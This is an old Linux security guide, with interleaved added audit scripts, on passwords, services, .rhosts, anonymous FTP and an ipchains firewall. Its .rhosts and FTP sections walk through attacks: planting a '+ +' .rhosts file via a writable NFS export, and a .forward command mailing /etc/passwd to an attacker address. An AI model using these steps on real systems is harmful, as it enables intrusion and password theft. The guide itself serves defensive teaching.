Synfire's Quick Guide to Linux

Securing Your Linux Box

"You are only as strong as your weakest link of defence." - Unknown

This text won't go into setting up LANs or WANs the way you would if you were running a large network that needs as much security as Fort Knox, but it does cover the things that the average user connecting to the Internet should do. ( It is a VERY good idea to install a firewall of some sort, I prefer Bastille, on every computer that you connect to the Internet. ) This section is separated into subsections, numbered for ease of use.

1) Passwords.

Unfortunately, an uncrackable password does not exist. Any password, given time and effort, can be guessed, either through brute force, algorithm translation programs (ATP), or social engineering. Since password cracking can be really time consuming, make it as hard as possible for any attacker who has grabbed your password file.

Running a password cracker on a daily basis on your system is a good start. This helps to find and replace passwords that are easily guessed. Also, a password checking program should be present to reject a weak password when a user chooses a password or changes an old one. Character strings that are plain dictionary words, or that do not contain digits or special characters, should not be accepted. A good password strategy should be made and enforced. The best strategy I have seen was when I was working at a Cyber Crime agency that I will keep nameless for my own security purposes. They would have their employees pick a phrase from the employee's religious text, such as "Eight words the wiccan rede fulfill, An ye harm none do as ye will!", take the first letter of each word, "ewtwrfayhndayw", and insert the employee's work ID number in a pattern, "ew4tw1rf5ay0hn4da2yw". A jumbled mesh like this, which the employees could still remember, strongly increased the security of the whole company.

Word lists, also known as dictionary files, that can be fed into a password cracker are easily found on the Internet. These files usually contain usernames, real-world words, and numerical patterns. None that I have seen contain words like "ew4tw1rf5ay0hn4da2yw". But there are more advanced password crackers that have an Incremental Cracking Mode, which will try every combination of every letter, digit, and special character until the password is found. As you could guess, this takes an enormous amount of time, and usually an attacker would much rather go after an easier target than spend that much time on one user account.
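Here is an added example, not part of the original guide, of a small POSIX shell checker that applies the policy described above: it refuses short passwords, refuses plain dictionary words even when they are padded with digits or punctuation, and demands at least one digit or special character. The word list is a constructed sample and the 8-character minimum is my assumption.

```shell
#!/bin/sh
# Added example: a password-acceptance check implementing the policy above.
# Usage: check_password PASSWORD WORDLIST  -> prints ACCEPT or a REJECT reason,
# returns 1 on rejection. The 8-character minimum is an assumed value.

check_password() {
    pw=$1
    dict=$2

    if [ "${#pw}" -lt 8 ]; then
        echo "REJECT: shorter than 8 characters"; return 1
    fi

    # Strip digits and punctuation, then look the remainder up in the word list
    # (whole line, case-insensitive). This catches "password123" and "secret!"
    # as readily as the bare word.
    letters=$(printf '%s' "$pw" | tr -cd 'A-Za-z')
    if [ -n "$letters" ] && grep -qix -- "$letters" "$dict"; then
        echo "REJECT: dictionary word (\"$letters\") with trivial padding"; return 1
    fi

    # Require at least one digit or one character that is neither letter nor digit.
    case $pw in
        *[0-9]*|*[!A-Za-z0-9]*) ;;
        *) echo "REJECT: no digit or special character"; return 1 ;;
    esac

    echo "ACCEPT"
}

# Constructed word list for the demo; a real checker would load a full dictionary.
make_demo_wordlist() {
    f=$(mktemp)
    printf '%s\n' password secret wiccan letmein > "$f"
    echo "$f"
}

# Stand-alone demo: the guide's sample passphrase next to some weak choices.
wl=$(make_demo_wordlist)
for candidate in 'password' 'Secret!' 'letmein99!' 'ew4tw1rf5ay0hn4da2yw'; do
    printf '%-22s ' "$candidate"
    check_password "$candidate" "$wl" || true
done
rm -f "$wl"
```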

2) Running Services

Another big threat to a computer's security is having services running that are not really needed. By default many distros of Linux have HTTP, FTP, SMB, Sendmail, and many other services running right from the beginning. When I install a distribution, the first thing I do is run a port scanner, I suggest NMAP, on the system to see all services running. To do so using NMAP, try typing:

nmap -sS 127.0.0.1

This will display a list of all open ports on your system, including the name of the service. Once you find all the services that are running, decide which ones you want and close all the rest. NOTE: Unless you SERIOUSLY need it, always disable Sendmail.

Sendmail is one of the biggest security risks in Linux/Unix operating systems, and I usually delete it completely from the system I am installing. But if you want to keep the service and just don't want it running, type "ps aux | grep sendmail" (or "ps aux" on its own to list everything running) to display the process ID (PID) of the running daemon. Then, once you have the service's PID, all you have to do is type "kill -9 <PID>" and press enter. Another thing to do is to comment out the services in your start-up scripts so they won't be turned back on when your computer restarts.

3) .rhosts

Using .rhosts files is a big security risk and they should not be used. When I was working for a Tiger Team ( a group of hackers that companies pay to break into their computers and give advice on security ), one of my favorite attacks used .rhosts. It took advantage of the user running a poorly configured NFS service.

I would find out what file systems the user had exported, then look to see if any were world writable ( do this on your computer by typing 'showmount -e' ). Once I found a world writable file system, I would mount it on my computer and place a .rhosts file with '+ +' as the first line into a user's home directory. Then all I had to do was telnet to the victim computer, enter the name of the user whose home directory I had planted the .rhosts file in, and the system was compromised.
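As an added example, not part of Synfire's text, the following POSIX shell script looks for the two conditions the attack above depends on, from the defender's side: .rhosts files containing '+' wildcards (or writable by others) and NFS exports that any host can mount. The home directories and exports file it audits are constructed sample data.

```shell
#!/bin/sh
# Added example (not from the guide): find the two conditions the attack above
# relies on, so they can be fixed first. audit_rhosts BASE checks every
# BASE/*/.rhosts for '+' wildcard fields and loose permissions; audit_exports FILE
# checks an /etc/exports-style file for unrestricted clients and no_root_squash.

audit_rhosts() {
    for f in "$1"/*/.rhosts; do
        [ -f "$f" ] || continue
        # A file others can write is as bad as a wildcard: anyone can add '+ +'.
        [ -z "$(find "$f" -maxdepth 0 \( -perm -020 -o -perm -002 \))" ] \
            || echo "RISK: $f is group- or world-writable"
        # Host field '+' trusts every host; user field '+' trusts every user.
        awk -v file="$f" '
            /^[ \t]*#/ || NF == 0 { next }
            $1 == "+" || $2 == "+" { print "RISK: " file " line " NR ": wildcard entry \"" $0 "\"" }
        ' "$f"
    done
}

audit_exports() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }
        NF == 1 { print "RISK: " $1 " is exported to every host"; next }
        { for (i = 2; i <= NF; i++) {
              if ($i ~ /^[*(]/)          print "RISK: " $1 " is exported to an unrestricted client (" $i ")"
              if ($i ~ /no_root_squash/) print "RISK: " $1 " lets remote root stay root (" $i ")"
          } }
    ' "$1"
}

# Constructed demo data: three home directories and a small exports file.
make_demo() {
    base=$(mktemp -d)
    mkdir -p "$base/home/alice" "$base/home/bob" "$base/home/carol"
    echo 'trusted.example.com alice' > "$base/home/alice/.rhosts"   # specific host and user
    echo '+ +'                       > "$base/home/bob/.rhosts"     # trusts everyone, anywhere
    echo '+ carol'                   > "$base/home/carol/.rhosts"   # carol from any host...
    chmod 644 "$base/home/alice/.rhosts" "$base/home/bob/.rhosts"
    chmod 666 "$base/home/carol/.rhosts"                            # ...and anyone can edit it
    printf '%s\n' '# constructed sample' '/export/pub client1.example.com(ro)' \
        '/home *(rw,no_root_squash)' '/tmp' > "$base/exports"
    echo "$base"
}

demo=$(make_demo)
audit_rhosts "$demo/home"
audit_exports "$demo/exports"
rm -rf "$demo"
```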

4) Anon FTP

Disable anonymous FTP servers. Unless you are very, very careful, an attacker can easily get your password file and, as described earlier, can then crack your passwords. Anon FTP can be easily cracked like so:

  1. Create a fake .forward file that has the following command in it:
    • |/bin/mail attacker@email.com < /etc/passwd
  2. Connect to the victim through FTP and log in as user FTP.
  3. Enter any password you wish.
  4. Upload the .forward file you have created.
  5. Log out and send mail to ftp@victim.machine.com.

Sit back as victim.machine.com e-mails you a copy of its local password file.

In five steps that take about two minutes to complete ( depending on the attacker's modem speed ), the attacker has a copy of your password file, which he/she will slowly but surely decipher, and your system will be compromised. My rule of thumb is to never run anonymous FTP daemons, but if you really want to, here is a list of rules that should help you run a fairly safe anonymous FTP daemon:

  1. Only the /incoming directory should be made writable and only by root and user FTP.
  2. Anonymous FTP users should have only executable (and read) access to the /pub and the /incoming directory.
  3. FTP users should NOT be able to write to /ftp.
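An added example, not from the original guide: a POSIX shell audit of an anonymous FTP tree against the three rules above, assuming the usual layout of a pub and an incoming directory under the FTP root; the demo trees it builds are constructed.

```shell
#!/bin/sh
# Added example (not from the guide): check an anonymous FTP tree against the
# three rules above. Assumes ROOT/pub and ROOT/incoming. Prints one
# "VIOLATION: ..." line per problem and nothing at all for a clean tree.

audit_ftp_tree() {
    root=$1
    # Rule 3: the FTP root itself must not be writable by group or others.
    [ -z "$(find "$root" -maxdepth 0 \( -perm -020 -o -perm -002 \))" ] \
        || echo "VIOLATION: $root is group- or world-writable"

    # Rule 1: below the root, nothing but incoming itself may be group/world-writable.
    find "$root" -mindepth 1 \( -perm -020 -o -perm -002 \) ! -path "$root/incoming" \
        | sort | while read -r f; do
            echo "VIOLATION: $f is group- or world-writable"
        done

    # Rule 1: incoming must exist, be writable by its owner (root or ftp), never by the world.
    if [ ! -d "$root/incoming" ]; then
        echo "VIOLATION: $root/incoming is missing"
    else
        [ -n "$(find "$root/incoming" -maxdepth 0 -perm -200)" ] \
            || echo "VIOLATION: $root/incoming is not writable by its owner"
        [ -z "$(find "$root/incoming" -maxdepth 0 -perm -002)" ] \
            || echo "VIOLATION: $root/incoming is world-writable"
    fi

    # Rule 2: anonymous users need read and execute (search) on pub and incoming.
    for d in pub incoming; do
        [ -d "$root/$d" ] || continue
        [ -n "$(find "$root/$d" -maxdepth 0 -perm -005)" ] \
            || echo "VIOLATION: $root/$d is not readable and searchable by anonymous users"
    done
}

make_demo_tree() {                   # constructed: "good" follows the rules, "bad" breaks them
    base=$(mktemp -d)
    mkdir -p "$base/pub/tools" "$base/incoming"; : > "$base/pub/tools/README"
    if [ "$1" = good ]; then
        chmod 755 "$base" "$base/pub" "$base/pub/tools"; chmod 644 "$base/pub/tools/README"
        chmod 775 "$base/incoming"   # owner and group (root/ftp) may write, the world may not
    else
        chmod 777 "$base" "$base/pub" "$base/incoming"; chmod 755 "$base/pub/tools"
        chmod 666 "$base/pub/tools/README"   # root, pub, incoming and a file open to everyone
    fi
    echo "$base"
}

tree=$(make_demo_tree bad)
audit_ftp_tree "$tree"
rm -rf "$tree"
```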

5) Linux Updates

Keep up to date with all the latest exploits and security issues that come out. There are many newsgroups you can join that will send you information on the latest security issues. Hackers read these and you should too! My favorite of all these, and the best out there, is the Computer Emergency Response Team ( CERT ); you can learn all about security there and they keep very up to date.

Here are a few security related links you should check out:

  1. CERT Advisories
  2. Information Systems Security
  3. Anti-Online - "The hackers know, shouldn't you?"

6) Security Configuration Script

Normally I don't add anything anyone else writes to my texts, but this was a great script for setting up quick network security. If you plan to use your Linux box as a network router or gateway, then I suggest you read his tutorial, Ghost_Rider's Linux Networking Tutorial, at http://blacksun.box.sk.

   #!/bin/sh
   # Example ipchains Script
   # By Ghost_Rider
   # For linux networking tutorial
   #
   # Assumes: lo = loopback, eth0 = trusted LAN (192.168.0.0/24),
   # ppp0 = dial-up link to the Internet.

   IPCHAINS="/sbin/ipchains"
   DNSSERVER="PUT UR DNS SERVER HERE"   # IP address of your ISP's DNS server
   LAN="192.168.0.0/24"                 # the network behind this box

   # Flush existing rules

   $IPCHAINS -F input
   $IPCHAINS -F output
   $IPCHAINS -F forward

   # Set default policies: drop incoming and forwarded packets
   # unless a rule below allows them

   $IPCHAINS -P input DENY
   $IPCHAINS -P output ACCEPT
   $IPCHAINS -P forward DENY

   # Accept all local traffic (loopback and the trusted LAN interface)

   $IPCHAINS -A input -i lo -j ACCEPT
   $IPCHAINS -A input -i eth0 -j ACCEPT

   # Deny private (RFC 1918) source addresses coming from ppp0:
   # attempts to spoof an inside address and use our host to masquerade.
   # Note the whole 192.168.0.0/16 block is private, not just our /24.

   $IPCHAINS -A input -i ppp0 -s 10.0.0.0/8 -j DENY
   $IPCHAINS -A input -i ppp0 -s 172.16.0.0/12 -j DENY
   $IPCHAINS -A input -i ppp0 -s 192.168.0.0/16 -j DENY

   # Set up IP masquerading for the LAN

   echo "1" > /proc/sys/net/ipv4/ip_forward
   $IPCHAINS -A forward -s $LAN -d ! $LAN -j MASQ

   # Allow DNS replies from our name server

   $IPCHAINS -A input -i ppp0 -p tcp -s $DNSSERVER --sport 53 -j ACCEPT
   $IPCHAINS -A input -i ppp0 -p udp -s $DNSSERVER --sport 53 -j ACCEPT

   # Reject auth (ident) so you don't have to wait for a timeout when sending mail

   $IPCHAINS -A input -i ppp0 -p tcp --dport 113 -j REJECT

   # Allow the ICMP types we need. In ipchains the ICMP *type* is given in the
   # source-port field (--sport); --dport would match on the ICMP *code* instead.
   # 0 = echo reply
   # 3 = destination unreachable
   # 11 = time exceeded

   $IPCHAINS -A input -i ppp0 -p icmp --sport 0 -j ACCEPT
   $IPCHAINS -A input -i ppp0 -p icmp --sport 3 -j ACCEPT
   $IPCHAINS -A input -i ppp0 -p icmp --sport 11 -j ACCEPT

   # Deny and log everything else..
   # Let's see what is on the next door

   $IPCHAINS -A input -i ppp0 -j DENY -l

Where to get a Linux or Unix Operating System?

FreeBSD - A free, secure version of Unix.
Slackware Linux - A free, powerful distro of Linux.
PhatLinux - A free Linux distro that can be run on a Windows partition.
PicoBSD - A small version of FreeBSD that can be run from a floppy disk!
